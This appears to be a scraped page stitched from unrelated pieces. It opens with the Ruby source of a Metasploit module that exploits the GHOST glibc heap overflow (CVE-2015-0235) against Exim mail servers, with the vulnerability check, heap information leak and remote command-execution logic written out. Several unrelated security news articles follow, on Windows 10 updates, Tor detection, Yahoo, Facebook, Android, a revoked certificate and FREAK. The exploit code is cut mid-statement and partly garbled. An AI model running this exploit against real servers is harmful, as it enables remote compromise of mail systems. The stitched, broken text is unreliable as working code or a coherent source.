Aerosol

@askwrite da bre ai dreptate dar putea sa-i dea din prima duplicat.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow', 'Description' => %q( This module remotely exploits CVE-2015-0235 (a.k.a. GHOST, a heap-based buffer overflow in the GNU C Library's gethostbyname functions) on x86 and x86_64 GNU/Linux systems that run the Exim mail server. Technical information about the exploitation can be found in the original GHOST advisory, and in the source code of this module. ------------------------------------------------------------------------ SERVER-SIDE REQUIREMENTS (Exim) ------------------------------------------------------------------------ The remote system must use a vulnerable version of the GNU C Library: the first exploitable version is glibc-2.6, the last exploitable version is glibc-2.17; older versions might be exploitable too, but this module depends on the newer versions' fd_nextsize (a member of the malloc_chunk structure) to remotely obtain the address of Exim's smtp_cmd_buffer in the heap. ------------------------------------------------------------------------ The remote system must run the Exim mail server: the first exploitable version is exim-4.77; older versions might be exploitable too, but this module depends on the newer versions' 16-KB smtp_cmd_buffer to reliably set up the heap as described in the GHOST advisory. ------------------------------------------------------------------------ The remote Exim mail server must be configured to perform extra security checks against its SMTP clients: either the helo_try_verify_hosts or the helo_verify_hosts option must be enabled; the "verify = helo" ACL might be exploitable too, but is unpredictable and therefore not supported by this module. ------------------------------------------------------------------------ CLIENT-SIDE REQUIREMENTS (Metasploit) ------------------------------------------------------------------------ This module's "exploit" method requires the SENDER_HOST_ADDRESS option to be set to the IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim); additionally, this IPv4 address must have both forward and reverse DNS entries that match each other (Forward-Confirmed reverse DNS). ------------------------------------------------------------------------ The remote Exim server might be exploitable even if the Metasploit client has no FCrDNS, but this module depends on Exim's sender_host_name variable to be set in order to reliably control the state of the remote heap. ------------------------------------------------------------------------ TROUBLESHOOTING ------------------------------------------------------------------------ "bad SENDER_HOST_ADDRESS (nil)" failure: the SENDER_HOST_ADDRESS option was not specified. ------------------------------------------------------------------------ "bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)" failure: the SENDER_HOST_ADDRESS option was specified, but not in IPv4 dotted-decimal notation. ------------------------------------------------------------------------ "bad SENDER_HOST_ADDRESS (helo_verify_hosts)" or "bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)" failure: the SENDER_HOST_ADDRESS option does not match the IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim). ------------------------------------------------------------------------ "bad SENDER_HOST_ADDRESS (no FCrDNS)" failure: the IPv4 address of the SMTP client (Metasploit) has no Forward-Confirmed reverse DNS. ------------------------------------------------------------------------ "not vuln? old glibc? (no leaked_arch)" failure: the remote Exim server is either not vulnerable, or not exploitable (glibc versions older than glibc-2.6 have no fd_nextsize member in their malloc_chunk structure). ------------------------------------------------------------------------ "NUL, CR, LF in addr? (no leaked_addr)" failure: Exim's heap address contains bad characters (NUL, CR, LF) and was therefore mangled during the information leak; this exploit is able to reconstruct most of these addresses, but not all (worst-case probability is ~1/85, but could be further improved). ------------------------------------------------------------------------ "Brute-force SUCCESS" followed by a nil reply, but no shell: the remote Unix command was executed, but spawned a bind-shell or a reverse-shell that failed to connect (maybe because of a firewall, or a NAT, etc). ------------------------------------------------------------------------ "Brute-force SUCCESS" followed by a non-nil reply, and no shell: the remote Unix command was executed, but failed to spawn the shell (maybe because the setsid command doesn't exist, or awk isn't gawk, or netcat doesn't support the -6 or -e option, or telnet doesn't support the -z option, etc). ------------------------------------------------------------------------ Comments and questions are welcome! ), 'Author' => ['Qualys, Inc. <qsa[at]qualys.com>'], 'License' => BSD_LICENSE, 'References' => [ ['CVE', '2015-0235'], ['US-CERT-VU', '967332'], ['OSVDB', '117579'], ['BID', '72325'], ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt'] ], 'DisclosureDate' => 'Jan 27 2015', 'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim) 'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload 'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^ 'Payload' => { 'Space' => 255, # the shorter the payload, the higher the probability of code execution 'BadChars' => "", # we encode the payload ourselves, because ^ 'DisableNops' => true, 'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell }, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0 )) register_options([ Opt::RPORT(25), OptAddress.new('SENDER_HOST_ADDRESS', [false, 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil]) ], self.class) register_advanced_options([ OptBool.new('I_KNOW_WHAT_I_AM_DOING', [false, 'Please read the source code for details', nil]) ], self.class) end def check # for now, no information about the vulnerable state of the target check_code = Exploit::CheckCode::Unknown begin # not exploiting, just checking smtp_connect(false) # malloc()ate gethostbyname's buffer, and # make sure its next_chunk isn't the top chunk 9.times do smtp_send("HELO ", "", "0", "", "", 1024+16-1+0) smtp_recv(HELO_CODES) end # overflow (4 bytes) gethostbyname's buffer, and # overwrite its next_chunk's size field with 0x00303030 smtp_send("HELO ", "", "0", "", "", 1024+16-1+4) # from now on, an exception means vulnerable check_code = Exploit::CheckCode::Vulnerable # raise an exception if no valid SMTP reply reply = smtp_recv(ANY_CODE) # can't determine vulnerable state if smtp_verify_helo() isn't called return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/ # realloc()ate gethostbyname's buffer, and # crash (old glibc) or abort (new glibc) # on the overwritten size field smtp_send("HELO ", "", "0", "", "", 2048-16-1+4) # raise an exception if no valid SMTP reply reply = smtp_recv(ANY_CODE) # can't determine vulnerable state if smtp_verify_helo() isn't called return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/ # a vulnerable target should've crashed by now check_code = Exploit::CheckCode::Safe rescue peer = "#{rhost}:#{rport}" vprint_debug("#{peer} - Caught #{$!.class}: #{$!.message}") ensure smtp_disconnect end return check_code end def exploit unless datastore['I_KNOW_WHAT_I_AM_DOING'] print_status("Checking if target is vulnerable...") fail_with("exploit", "Vulnerability check failed.") if check != Exploit::CheckCode::Vulnerable print_good("Target is vulnerable.") end information_leak code_execution end private HELO_CODES = '250|451|550' ANY_CODE = '[0-9]{3}' MIN_HEAP_SHIFT = 80 MIN_HEAP_SIZE = 128 * 1024 MAX_HEAP_SIZE = 1024 * 1024 # Exim ALIGNMENT = 8 STORE_BLOCK_SIZE = 8192 STOREPOOL_MIN_SIZE = 256 LOG_BUFFER_SIZE = 8192 BIG_BUFFER_SIZE = 16384 SMTP_CMD_BUFFER_SIZE = 16384 IN_BUFFER_SIZE = 8192 # GNU C Library PREV_INUSE = 0x1 NS_MAXDNAME = 1025 # Linux MMAP_MIN_ADDR = 65536 def information_leak print_status("Trying information leak...") leaked_arch = nil leaked_addr = [] # try different heap_shift values, in case Exim's heap address contains # bad chars (NUL, CR, LF) and was mangled during the information leak; # we'll keep the longest one (the least likely to have been truncated) 16.times do done = catch(:another_heap_shift) do heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15) print_debug("#{{ heap_shift: heap_shift }}") # write the malloc_chunk header at increasing offsets (8-byte step), # until we overwrite the "503 sender not yet given" error message 128.step(256, 8) do |write_offset| error = try_information_leak(heap_shift, write_offset) print_debug("#{{ write_offset: write_offset, error: error }}") throw(:another_heap_shift) if not error next if error == "503 sender not yet given" # try a few more offsets (allows us to double-check things, # and distinguish between 32-bit and 64-bit machines) error = [error] 1.upto(5) do |i| error[i] = try_information_leak(heap_shift, write_offset + i*8) throw(:another_heap_shift) if not error[i] end print_debug("#{{ error: error }}") _leaked_arch = leaked_arch if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd (error[4] =~ /\A503 send[^e].?\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size (error[5] == "177") # the last \x7F of our BAD1 command, encoded as \\177 by string_printing() leaked_arch = ARCH_X86_64 elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize (error[1].empty? or (error[1].unpack('C')[0] & 3) == 0) and # fd (error[2] =~ /\A503 [^s].?\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size (error[3] == "177") # the last \x7F of our BAD1 command, encoded as \\177 by string_printing() leaked_arch = ARCH_X86 else throw(:another_heap_shift) end print_debug("#{{ leaked_arch: leaked_arch }}") fail_with("infoleak", "arch changed") if _leaked_arch and _leaked_arch != leaked_arch # try different large-bins: most of them should be empty, # so keep the most frequent fd_nextsize address # (a pointer to the malloc_chunk itself) count = Hash.new(0) 0.upto(9) do |last_digit| error = try_information_leak(heap_shift, write_offset, last_digit) next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK count[error] += 1 end print_debug("#{{ count: count }}") throw(:another_heap_shift) if count.empty? # convert count to a nested array of [key, value] arrays and sort it error_count = count.sort { |a, b| b[1] <=> a[1] } error_count = error_count.first # most frequent error = error_count[0] count = error_count[1] throw(:another_heap_shift) unless count >= 6 # majority leaked_addr.push({ error: error, shift: heap_shift }) # common-case shortcut if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == "er not yet given") or (leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count("\x7E-\x7F").nonzero?) leaked_addr = [leaked_addr.last] # use this one, and not another throw(:another_heap_shift, true) # done end throw(:another_heap_shift) end throw(:another_heap_shift) end break if done end fail_with("infoleak", "not vuln? old glibc? (no leaked_arch)") if leaked_arch.nil? fail_with("infoleak", "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr.empty? leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length } leaked_addr = leaked_addr.first # longest error = leaked_addr[:error] shift = leaked_addr[:shift] leaked_addr = 0 (leaked_arch == ARCH_X86 ? 4 : 8).times do |i| break if i >= error.length leaked_addr += error.unpack('C*')[i] * (2**(i*8)) end # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer: leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE fail_with("infoleak", "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr <= MMAP_MIN_ADDR print_good("Successfully leaked_arch: #{leaked_arch}") print_good("Successfully leaked_addr: #{leaked_addr.to_s(16)}") @leaked = { arch: leaked_arch, addr: leaked_addr } end def try_information_leak(heap_shift, write_offset, last_digit = 9) fail_with("infoleak", "heap_shift") if (heap_shift < MIN_HEAP_SHIFT) fail_with("infoleak", "heap_shift") if (heap_shift & 15) != 0 fail_with("infoleak", "write_offset") if (write_offset & 7) != 0 fail_with("infoleak", "last_digit") if "#{last_digit}" !~ /\A[0-9]\z/ smtp_connect # bulletproof Heap Feng Shui; the hard part is avoiding: # "Too many syntax or protocol errors" (3) # "Too many unrecognized commands" (3) # "Too many nonmail commands" (10) smtp_send("HELO ", "", "0", @sender # avoid a future pathological case by forcing it now: # "Do NOT free the first successor, if our current block has less than 256 bytes left." smtp_send("MAIL FROM:", "<", method(:rand_text_alpha), ">", "", STOREPOOL_MIN_SIZE + 16) smtp_recv(501, 'sender address must contain a domain') smtp_send("RSET") smtp_recv(250, 'Reset OK') end def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil) fail_with("smtp_send", "state is #{@smtp_state}") if @smtp_state != :send @smtp_state = :sending if not arg_pattern fail_with("smtp_send", "prefix is nil") if not prefix fail_with("smtp_send", "param isn't nil") if arg_prefix or arg_suffix or suffix or arg_length command = prefix else fail_with("smtp_send", "param is nil") unless prefix and arg_prefix and arg_suffix and suffix and arg_length length = arg_length - arg_prefix.length - arg_suffix.length fail_with("smtp_send", "len is #{length}") if length <= 0 argument = arg_prefix case arg_pattern when String argument += arg_pattern * (length / arg_pattern.length) argument += arg_pattern[0, length % arg_pattern.length] when Method argument += arg_pattern.call(length) end argument += arg_suffix fail_with("smtp_send", "arglen is #{argument.length}, not #{arg_length}") if argument.length != arg_length command = prefix + argument + suffix end fail_with("smtp_send", "invalid char in cmd") if command.count("^\x20-\x7F") > 0 fail_with("smtp_send", "cmdlen is #{command.length}") if command.length > SMTP_CMD_BUFFER_SIZE command += "\n" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer # the following loop works around a bug in the put() method: # "while (send_idx < send_len)" should be "while (send_idx < buf.length)" # (or send_idx and/or send_len could be removed altogether, like here) while command and not command.empty? num_sent = sock.put(command) fail_with("smtp_send", "sent is #{num_sent}") if num_sent <= 0 fail_with("smtp_send", "sent is #{num_sent}, greater than #{command.length}") if num_sent > command.length command = command[num_sent..-1] end @smtp_state = :recv end def smtp_recv(expected_code = nil, expected_data = nil) fail_with("smtp_recv", "state is #{@smtp_state}") if @smtp_state != :recv @smtp_state = :recving failure = catch(:failure) do # parse SMTP replies very carefully (the information # leak injects arbitrary data into multiline replies) data = "" while data !~ /(\A|\r\n)[0-9]{3}[ ].*\r\n\z/mn begin more_data = sock.get_once rescue throw(:failure, "Caught #{$!.class}: #{$!.message}") end throw(:failure, "no more data") if more_data.nil? throw(:failure, "no more data") if more_data.empty? data += more_data end throw(:failure, "malformed reply (count)") if data.count("\0") > 0 lines = data.scan(/(?:\A|\r\n)[0-9]{3}[ -].*?(?=\r\n(?=[0-9]{3}[ -]|\z))/mn) throw(:failure, "malformed reply (empty)") if lines.empty? code = nil lines.size.times do |i| lines[i].sub!(/\A\r\n/mn, "") lines[i] += "\r\n" if i == 0 code = lines[i][0,3] throw(:failure, "bad code") if code !~ /\A[0-9]{3}\z/mn if expected_code and code !~ /\A(#{expected_code})\z/mn throw(:failure, "unexpected #{code}, expected #{expected_code}") end end line_begins_with = lines[i][0,4] line_should_begin_with = code + (i == lines.size-1 ? " " : "-") if line_begins_with != line_should_begin_with throw(:failure, "line begins with #{line_begins_with}, " \ "should begin with #{line_should_begin_with}") end end throw(:failure, "malformed reply (join)") if lines.join("") != data if expected_data and data !~ /#{expected_data}/mn throw(:failure, "unexpected data") end reply = { code: code, lines: lines } @smtp_state = :send return reply end fail_with("smtp_recv", "#{failure}") if expected_code return nil end def smtp_disconnect disconnect if sock fail_with("smtp_disconnect", "sock isn't nil") if sock @smtp_state = :disconnected end end Source

Does downloading Windows updates from Microsoft's servers and waiting too long really annoy you? It might not be with the arrival of Windows 10. Microsoft seems to make a major change in Windows 10 to the way it delivers updates for the software. The leaked version of Windows 10 build 10036 (the current version is build 9926) allows you to grab OS updates from Microsoft as well as other computers, whether they're on your local network or on the Internet. Yeah, it's a Peer-to-Peer (P2P) technology Microsoft is going to use in order to deliver both app and operating system updates. Peer-to-Peer, or P2P Technology is usually associated with file sharing services like BitTorrent to download illicit copies of movies and albums, and of course, those endless Linux ISOs you've been downloading. However, Redmond is embracing the technology as an efficient means to deliver software updates to its users around the globe. Peer-to-Peer downloads will be optional in Windows 10. The new dialog box titled "Choose how you download updates" offers Windows users an option to "Download apps and OS updates from multiple sources to get them more quickly". Once turned ON, the option delivers you choices to Download apps and OS updates from Microsoft and PCs on my local network Download apps and OS updates from Microsoft, PCs on my local network, and PCs on the Internet Besides accelerating the upgrade process, P2P feature could save precious bandwidth if you have a multiple PCs in your house. Redmond's move is not at all surprising, as the software maker bought Pando Networks in 2013, which is the maker of a peer-to-peer file sharing technology, similar to BitTorrent. So far, the leaked screenshot is not confirmed by the company neither it released any official announcement, but you can expect the new release of an official Windows 10 preview shortly that will likely include the new changes. However, if Microsoft really includes P2P technology for updating its software, it will be an interesting option for enabling distributed updates, rather than updating through Windows Server Update Services. Home users might appreciate the faster downloads that will come with peer-to-peer downloads. Source

Are you aware of everything that your users are accessing from your environment? While most of the time, non-work-related Internet browsing is harmless (looking at pictures of cats, online shopping, social media, etc.) there are some instances where you could be an unknowing and unwilling participant in criminal activity. That is, when users hide that activity via the Tor network, or the Dark Net. The Onion Router, better known as "Tor", an open source project, launched in 2002, is designed to allow a user to browse the Internet anonymously via a volunteer network of more than 5000 relays. It doesn't share your identifying information like your IP address and physical location with websites or service providers. A user that navigate Internet using Tor, it's quite difficult to trace its activities ensuring his online privacy. There are arguably legitimate uses for this technology, such as providing Internet access in repressively regulated countries. Tor has been a favorite target of intelligence agencies. NSA targeted the Tor users, using a zero-day vulnerability in Firefox browser, bundled with Tor, that allowed them to get the real IP address of the anonymous Tor users. Using same techniques, FBI was also able to track the Owner of 'Freedom Hosting', the biggest service provider for sites on the encrypted Tor network, hosted many child pornography sites. However, Mozilla has then fixed that Firefox flaw exploited by government law enforcement officials. Moreover, Tor is often associated with illicit activity (child pornography, selling controlled substances, identity theft, money laundering, and so on). Most admins will want to prohibit their users from using the Tor network due to its association with nefarious activity. Since the point of origin is nearly impossible to determine with conventional means, many bad actors leverage the Tor network to hide the location of Command & Control servers, machines taking ransomware payments, etc. This makes identifying these them and their malware that much harder. Users browsing the Tor network (for illicit purposes or not) from your environment can open you up to hosting malicious/illegal content, Ransomware infection, or unknowingly participating in other malicious activity. Therefore it is also known as DeepNet or Deep Web. To know more detail about the Deep Web you can read our detailed article, "What is the Deep Web? A first trip into the abyss". WHAT I CAN DO ABOUT TOR? AlienVault Unified Security ManagementTM (USM) can help. USM provides asset discovery, vulnerability assessment, threat detection (IDS), behavioral monitoring and SIEM in a single console, plus weekly threat intelligence updates developed by the AlienVault Labs threat research team. The correlation directives and IDS signatures in AlienVault Unified Security Management (USM) can detect when a system is attempting to resolve a Tor domain, and allow you to take corrective action. Plus, new & updated correlation directives developed by the experts at AlienVault Labs are pushed to USM weekly, enabling detection of emerging threats. Learn more about AlienVault USM: Download a free 30-day trial Watch a demo on-demand Play with USM in our product sandbox (no download required) Source

Yahoo! has offered $24,000 to a security researcher for finding out and reporting three critical security vulnerabilities in its products including Yahoo! Stores and Yahoo!-hosted websites. While testing all the company's application, Mark Litchfield, a bug bounty hunter who often works with different companies, discovered three critical vulnerabilities in Yahoo!'s products. All the three vulnerabilities have now been fixed by Yahoo!. THREE CRITICAL SECURITY VULNERABILITIES The first and most critical vulnerability gives hackers full administrator access to Yahoo!'s e-commerce platform, Yahoo! Small Business, a portal that allows small business owners to create their own web stores through Yahoo! and sell merchandise. According to the researcher, the flaw in the service allowed him to fully administrator any Yahoo store and thereby gain access to customers' personally identifiable information, including names, email addresses, telephone numbers. BUG ALLOWS FREE SHOPPING Beside allowing hackers full admin access to the web stores, the vulnerability could also leverage an attacker to rig a user-run eCommerce web store to let them shop for free, or at a huge discount, Litchfield claimed. A separate but related vulnerability in Yahoo! Stores, second flaw discovered by Litchfield, allows an unauthorized user to edit Yahoo-hosted stores through the app, thereby creating a means for hackers to hijack an online website store. Last but not the least, Litchfield discovered a critical vulnerability in Yahoo’s Small Business portal that allows hackers to seize administrative access to Yahoo!-hosted websites and gain full, unauthorized access to them. The Internet giant patched all the three bugs two weeks ago after Litchfield publicly released details and proof of concepts for the exploits on Bug Bounty HQ, a community for Bug Bounties website, established by Litchfield last month for fellow hunters to share their findings. 'ON DEMAND PASSWORD' At recent SXSW session, Yahoo! launched 'on-demand passwords,' which it says will eliminate the need for you to ever remember your email password. Whenever you need it, the company will send you a OTP (one time password) via SMS to your mobile phone. It's sort of two-factor authentication—without the first factor involved, as there is no need of any log-in password to enter by a user. In order to opt-in for the feature follow some simple steps: Sign in to your Yahoo email account. Click on your name at the top right corner to access your account information page. Choose Security in the sidebar. Click on the slider for on-demand passwords, in order to opt-in. Enter your phone number and Yahoo will send you a verification code. Enter the code. Now, next time whenever you will sign in into your email account, Yahoo will send a password via an SMS to your phone when you need it. Also, the end-to-end email encryption that Yahoo! promised will be available soon by the end of this year. The company gave its first demonstration of the locked down messaging system at SXSW session, and it is also delivering early source code for security researchers to analyze. Source

Facebook today reported a slight drop in government requests for user data, bucking a trend that peaked during the first half of 2014 with the highest numbers the company had seen. Its latest transparency report covers the second half of last year, and shows slight dips in requests for user data, the number of accounts referenced and the percentage of requests where Facebook turned over some data. The numbers are still high, however, and demonstrate a continued interest on the part of the government to use data from web-based services in criminal and national security cases. Despite dips in requests in the United States—and Germany—Facebook said overall requests for user account data was up slightly from its last report, as was the number of government requests for data and content restrictions. In the U.S., for example, Facebook received 14,274 requests for user data affected 21,731 accounts; Facebook said it complied with 79 percent of those requests, turning over some content or user data. Content restriction requests, meanwhile, were almost exclusively dominated by India and Ukraine. By comparison, Facebook through the first six months of 2014, fielded 15,433 requests for user data affecting 23,667 accounts; in 80 percent of those occasions, Facebook turned over some data. “We publish this information because we want people to know the extent and nature of the requests we receive from governments and the policies we have in place to process them,” said Monika Bickert, head of Facebook global policy management, and Chris Sonderby, Deputy General Counsel. “Moving forward, we will continue to scrutinize each government request and push back when we find deficiencies. We will also continue to push governments around the world to reform their surveillance practices in a way that maintains the safety and security of their people while ensuring their rights and freedoms are protected.” Facebook also provided some insight into its Community Standards, which define what is acceptable content that is allowed to be posted on the social network. Bickert and Sonderby said there are occasions, for example, when Facebook is asked to remove or restrict access to content because it violates local law, even though it may be within the bounds of its standards. Those numbers are also included in today’s report, along with more detail and examples of what constitutes Facebook’s Community Standards. “We challenge requests that appear to be unreasonable or overbroad,” Bickert and Sonderby said. “And if a country requests that we remove content because it is illegal in that country, we will not necessarily remove it from Facebook entirely, but may restrict access to it in the country where it is illegal.” Source

Following up on a promise it made during last summer’s Black Hat, Yahoo on Sunday said it’s on track to deliver end-to-end encryption for its email users this year. And to that end, it released the early source code for the Yahoo encryption browser extension to GitHub. Chief information security officer Alex Stamos made the announcement at the South by Southwest Festival, where he said he hopes the security community will pore over the code and submit any vulnerabilities to Yahoo’s Bug Bounty program. He also said that he hopes other email providers will build compatible solutions. “Just a few years ago, e2e encryption was not widely discussed, nor widely understood. Today, our users are much more conscious of the need to stay secure online,” Stamos wrote on Yahoo’s Tumblr. He said that Yahoo’s extension will satisfy users’ needs to share sensitive information securely. “Wherever you land on the spectrum, we’ve heard you loud and clear: We’re building the best products to ensure a more secure user experience and overall digital ecosystem.” Yahoo also released a video, below, demonstrating the ease with which its encryption is deployed compared to GPG, a free and open source encryption implementation. Stamos hopes the solution, which he called “intuitive” would be available by the end of the year. “Anybody who has the ability to write an email should have no problem using our email encryption,” he said to AFP. Yahoo has made huge strides with its efforts to encrypt its web-based services beyond email, turning on HTTPS by default in January 2014 and four months later, encrypting traffic sent between its data centers. This was a weak spot known to be exploited by the National Security Agency, which was copying data from Yahoo and Google’s fiber-optic cables outside the United States. Last August during Black Hat, Stamos announced that Yahoo had partnered with Google on its efforts to encrypt email end to end in a fashion that would be transparent to users. Stamos said Yahoo would use the browser extension Google released in June that enables end-to-end encryption of all data leaving the browser. Stamos said at the time that Yahoo was working to ensure that its system works well with Google’s so that encrypted communications between Yahoo Mail and Gmail users will be simple. “I think anybody who uses email in the center of our life needs encryption,” Stamos said to AFP. “If you send emails to your spouse or your lawyer or family members, you want to have these messages be confidential.” Yahoo is also carrying over that same type of simplicity and intuitiveness to authentication. In addition on Sunday, it also announced a plan to ease the pain associated with passwords with the introduction of on-demand passwords. Director of product management Chris Stoner said in making the announcement that Yahoo users would no longer need to remember complex passwords to access their Yahoo accounts. Instead, once a user opts in to the on-demand password service, a verification code will be sent to the user’s mobile device that can be used to access their account. “It’s important for our products to be safe as used by normal people,” said Stamos. “Our users face a very diverse set of threats. The biggest threat is probably someone stealing their password, and their account taken over.” This article was corrected, correcting references of a plug-in to a browser extension. Source

Google is prepping a fix for Android users that addresses a meddlesome memory leakage issue that’s plagued some device users since the end of last year. The issue, present in versions 5.0.1 and 5.1 of the mobile operating system code-named Lollipop, has been causing irregular application activity on several Nexus devices for weeks. In some instances, users have apparently experienced issues launching apps and seen apps randomly restarting, often without opening or changing any application. The most prevalent issue users have witnessed has been a massive surge in memory usage. On an issue tracker for the for the bug on Android’s Open Source Project (AOSP) late last week some users reported seeing their RAM bloat to over 1 gigabyte and leave as little as 150 megabytes free, before their phones ultimately crashed. Users claim they’ve seen their phone’s system memory swell, usually after opening a game, then dismissing it. Even if apps are closed however, the phone will go on to gobble up memory until there’s no more space and the device stops responding. The issue – mostly seen in Nexus 5 devices – has lingered since December 2014, when Google pushed 5.0.1 to Nexus devices, but resurfaced in 5.1, which was rolled out last week. “Memory leak not fixed,” one user wrote on AOSP last week, “I’ve had system RAM bloated over 1GB, processes restarting and launcher redraws.” The issue was closed at Android’s Issue Tracker on Friday when a Google project member acknowledged the issue had been “fixed internally,” but added that the company did not have a timetable for public release. The bug’s status was also changed from “New” to “FutureRelease” on Friday, suggesting a fix is forthcoming, perhaps in 5.1.1, but emails to Google inquiring exactly when that fix would come were not immediately replied to on Monday Android’s security team has been busy over the past several months addressing issues that have popped up in Lollipop. In November it fixed a vulnerability that could have allowed an attacker to bypass ASLR and run arbitrary code on a target device under certain circumstances. In January the company took some heat for not fixing a bug in the WebView component of the OS on Jelly Bean 4.3, or older. Security engineers for Android later clarified that the issue would really be best fixed by OEMs and that it’s not practical for Google to push patches for older vulnerabilities. Source

Microsoft has blacklisted a phony SSL certificate that’s been making the rounds and is in the process of warning the general public that the certificate could be leveraged to stage man-in-the-middle attacks. In a security advisory published yesterday the company stressed that an improper certificate for the domain “live.fi” could also be used to spoof content or carry out phishing attacks, but stopped short saying it could issue other certificates, impersonate other domains, or sign code. The certificate, which corresponds to one of the company’s Live entities, was revoked by its issuer, certificate authority Comodo, and Microsoft has updated its Certificate Trust List (CTL) to reflect the instability. The company maintains an often in-flux Certificate Trust List as a running tally of trusted entities that are rooted to verifiable certificates. Microsoft blamed the botched certificate on a misconfigured privileged email account on the live.fi domain. It sounds like unauthorized third party was able to register an email account on the domain with a “privileged username,” and in turn used it to request a bogus certificate for live.fi. In a FAQ on its site, Comodo claims that all of its certificates must pass through Domain Control Validation (DCV) before they’re issued. It appears the aforementioned third party used an email (admin@, administrator@, postmaster@, etc.) to prove ownership of the domain and subsequently the certificate. Windows 8, 8.1, RT, RT 8.1, Server 2012 and Server 2012 R2 all contain an automatic updater that takes note of revoked certificates. The company warns that users who either opt not to run that automatic updater or run older setups, including Server 2003, should run the manual update KB2917500 to blacklist the certificate. It’s expected both Google Chrome and Mozilla Firefox will block the certificate over the next several days or so. In the very near future Firefox is expected to loop in a new feature, OneCRL, that will supersede the dated Online Certificate Status Protocol (OCSP) and improve upon the process in which the browser reviews and revokes certificates. Source

UPDATE: First the good news: it would seem that large providers and individual server admins have for the most part found and spiked export-grade cipher suites vulnerable to the FREAK attack. The bad news: It would seem it’s even less expensive than first believed to exploit the remaining servers still supporting 512-bit RSA keys. Researchers from Royal Holloway University in London on Monday published a report that demonstrates how an attacker, with a modest amount of computing power, could spare himself an expensive cloud-computing bill and attack servers still vulnerable to FREAK on the cheap. When news of the FREAK (Factoring Related Attack on RSA Keys) attack broke on March 3 from researchers at Microsoft and the French National Institute for Research in Computer Science and Control, a number of widely deployed SSL clients, including OpenSSL, were deemed vulnerable. The attack forces a server to downgrade and accept 512-bit keys, which was the U.S. government-approved key strength for export overseas, a leftover artifact thought to be long-ago abandoned by most clients. “The export-grade RSA ciphers are the remains of a 1980s-vintage effort to weaken cryptography so that intelligence agencies would be able to monitor. This was done badly. So badly, that while the policies were ultimately scrapped, they’re still hurting us today,” cryptographer Matthew Green of Johns Hopkins University explained two weeks ago. “The 512-bit export grade encryption was a compromise between dumb and dumber. In theory it was designed to ensure that the NSA would have the ability to ‘access’ communications, while allegedly providing crypto that was still ‘good enough’ for commercial use. Or if you prefer modern terms, think of it as the original ‘golden master key’.” The Royal Holloway study included a scan of the IPv4 address space (using the University of Michigan’s ZMap tool) which found 22.7 million hosts supporting TLS, 2.2 million of which offered export-grade 512-bit RSA keys when probed. Original reports from Microsoft and the French researchers put the original number of vulnerable servers at 26 percent, much higher than the 9.7 percent rendered by this most recent scan. The researchers, Martin R. Albrecht, Davide Papini, Kenneth G. Paterson and Ricardo Villanueva-Polanco, performed a computation using fastgcd software against 1.6 million distinct keys (once duplicates were removed from the original set of 2.2 million supporting the 512-bit keys). In doing so, they were able to factor 90 of the unique RSA moduli (at $100 per), meaning that 90 distinct keys shared moduli, Albrecht said. Because the keys shared moduli, Albrecht said, the factorization was done relatively inexpensively and in less than three minutes on eight 3.3Ghz Xeon core systems, and required less than 2GB of RAM. The researchers said they saved the $9,000 that it would have cost to use cloud-based resources to attack each one directly. Albrecht said there were also many repeated moduli, including one cluster of 28,394. “For those keys, we still have to spend $100 dollars, but we can use the result of this computation to break the encryption for all 28,394,” Albrecht said. “These keys were of the form `N_1 = p * q’ and `N_2 = p * q’. If this happens I still need to factor using a not-so-cheap method, but one factorization allows me to do more damage after.” “In this particular instance, these devices all seem to be consumer/small business level routers from the same manufacturer. The manufacturer simply put the same key on all these devices,” Albrecht told Threatpost, adding that the device may also generate the key from poor randomness. “When these devices boot up they generate these keys afresh on the device. If these devices do not have sufficient randomness they might produce the same key,” Albrecht said. “Recall that `n = p*q’ is a modulus for RSA where `p’ and `q’ are random primes (with some additional constraints not of relevance here). If your random number generator spits out the same numbers after each boot you’ll generate the same `n’.” Knowing the value of these primes undercuts any means of security in the encryption, giving an attacker an easy path to cracking the keys and owning traffic emanating from it. The ability to downgrade crypto to 512 bits is an alarming aspect of the FREAK attack, but almost as equally disturbing is the amount of modulus reuse, Albrecht said. “I only have to factor once to break all traffic using the same modulus. If I already have the factorization because I have access to an affected device I don’t even need to factor,” he said. This article 